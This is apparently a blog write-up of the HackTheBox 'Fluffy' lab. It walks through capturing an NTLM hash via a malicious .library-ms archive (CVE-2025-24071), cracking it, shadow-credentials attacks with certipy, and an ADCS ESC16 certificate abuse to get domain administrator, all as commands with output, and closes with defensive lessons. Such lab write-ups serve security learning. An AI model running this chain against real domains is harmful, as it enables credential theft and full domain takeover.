Back to Home

HTB Fluffy - Easy

Getting user hash via CVE-2025-24071, shadow credentials attack, and ADCS ESC16 privilege escalation

This machine involved getting a user's hash using a known Windows exploit (CVE-2025-24071), performing shadow credentials attack, and finally exploiting an ADCS ESC16 vulnerability to get administrator access.

# RECONNAISSANCE

Nmap Scan

PORT     STATE SERVICE      VERSION
53/tcp   open  domain       Simple DNS Plus
88/tcp   open  kerberos-sec Microsoft Windows Kerberos
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: fluffy.htb)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap     Microsoft Windows Active Directory LDAP
3268/tcp open  ldap         Microsoft Windows Active Directory LDAP
3269/tcp open  ssl/globalcatLDAPssl?
5985/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)

Added domain fluffy.htb to /etc/hosts. Provided with default credentials: j.fleischman:J0elTHEM4n1990!

SMB Enumeration

$ smbclient.py fluffy.htb/j.fleischman:'**********'@fluffy.htb
  Sharename       Type      Comment
  -----           ----      -------
  ADMIN$          Disk      Remote Admin
  C$              Disk      Default share
  IPC$            IPC       Remote IPC
  IT              Disk      IT Department Files
  NETLOGON        Disk      Logon server share
  SYSVOL          Disk      Logon server share

The IT share stood out as interesting. Downloaded files using get command.

Found Critical Vulnerability

In Upgrade_Notice.pdf, found references to CVE-2025-24071 - a spoofing vulnerability in Windows File Explorer that allows capturing NTLM hashes via malicious .library-ms files.

# USER - CVE-2025-24071 Exploitation

NTLM Hash Capture

# Run exploit to generate malicious zip
$ python3 CVE-2025-24071.py
[+] Generated malicious.zip with embedded SMB path

# Upload to IT share
$ smbclient //fluffy.htb/IT -U j.fleischman
smb: \> put malicious.zip

# Start Responder to capture hashes
$ sudo responder -I tun0 -dwv
[SMB] NTLMv2-SSP Hash: p.agila::FLUFFY:1122334455667788:ABC123...:010100...

Hash Cracking

$ hashcat -m 5600 p.agila.hash rockyou.txt
p.agila::FLUFFY:...:********** 

Recovered password: **********

BloodHound Analysis

Evil-WinRM failed for p.agila, so ran BloodHound to map attack paths:

$ bloodhound-python -u 'p.agila' -p '**********' -d fluffy.htb -ns 10.10.11.40 -c all

# Ingest into BloodHound
$ neo4j start
$ bloodhound

[*] p.agila → Service Account Managers (GenericAll)
[*] Service Accounts → GenericWrite on ca_svc, winrm_svc, ldap_svc
[*] winrm_svc → Remote Management Users

Shadow Credentials Attack

# Add p.agila to Service Accounts
$ net rpc group addmem "Service Accounts" "p.agila" -U fluffy/p.agila

# Perform shadow credentials attack on winrm_svc
$ certipy shadow auto -u p.agila@fluffy.htb -p '**********' -account winrm_svc
[*] Certificate saved to winrm_svc.pfx
[*] NTLM Hash: 7f3c456e8a9b1c2d3e4f567890abcdef

# Connect via Evil-WinRM
$ evil-winrm -i fluffy.htb -u winrm_svc -H 7f3c456e8a9b1c2d3e4f567890abcdef
*Evil-WinRM* PS C:\Users\winrm_svc\Desktop> type user.txt
HTB{****************}

Lateral Movement to ca_svc

# Perform shadow credentials on ca_svc
$ certipy shadow auto -u p.agila@fluffy.htb -p '**********' -account ca_svc
[*] Got NT hash: 9d4e5f678a1b2c3d4e5f678901234abc

# ROOT - ADCS ESC16 Exploitation

Certificate Services Enumeration

$ certipy find -u ca_svc@fluffy.htb -hashes :9d4e5f678a1b2c3d4e5f678901234abc
[*] Certificate Authorities
    fluffy-DC01-CA
    [!] ESC16: Security extension disabled globally on CA
    
[*] Vulnerable Templates Found:
    - User (ESC16 exploitable)

ESC16 Attack Chain

Following the Certipy ESC16 methodology, update UPN to administrator:

# Update UPN to administrator
$ certipy account update -u ca_svc@fluffy.htb -hashes :9d4e5f678a1b2c3d4e5f678901234abc \
  -user ca_svc -upn administrator

# Request certificate
$ certipy req -u ca_svc@fluffy.htb -hashes :9d4e5f678a1b2c3d4e5f678901234abc \
  -ca fluffy-DC01-CA -template User
[*] Certificate saved to ca_svc.pfx

# Set Kerberos cache
$ export KRB5CCNAME=ca_svc.ccache

# Revert UPN back
$ certipy account update -u ca_svc@fluffy.htb -hashes :9d4e5f678a1b2c3d4e5f678901234abc \
  -user ca_svc -upn ca_svc@fluffy.htb

Administrator Access

# Authenticate as administrator
$ certipy auth -pfx ca_svc.pfx -dc-ip 10.10.11.40
[*] Using principal: administrator@fluffy.htb
[*] Got NT hash: a1b2c3d4e5f67890a1b2c3d4e5f67890

# Connect as administrator
$ evil-winrm -i fluffy.htb -u administrator -H a1b2c3d4e5f67890a1b2c3d4e5f67890
*Evil-WinRM* PS C:\Users\Administrator\Desktop> whoami
fluffy\administrator

*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
HTB{****************}

# KEY LEARNINGS

  • #CVE-2025-24071: Windows File Explorer vulnerability allows NTLM hash capture via malicious .library-ms files embedded in archives
  • #Shadow Credentials: GenericWrite permissions allow adding alternate credentials to user objects for Kerberos authentication
  • #ESC16: Security extension disabled on CA allows UPN modification to impersonate any user via certificate requests
  • #BloodHound: Essential for mapping AD relationships and identifying privilege escalation paths through group memberships
  • #Defense: Enable security extensions on CA, implement LDAP signing, restrict GenericWrite permissions, monitor certificate requests

# TOOLS & REFERENCES

Click any tool below to access official documentation and reference guides

NmapSMBClientResponderHashcatBloodHoundCertipyEvil-WinRMNet RPC

# ROAHACKS - HTB Fluffy Easy Windows Machine | Published: November 27, 2025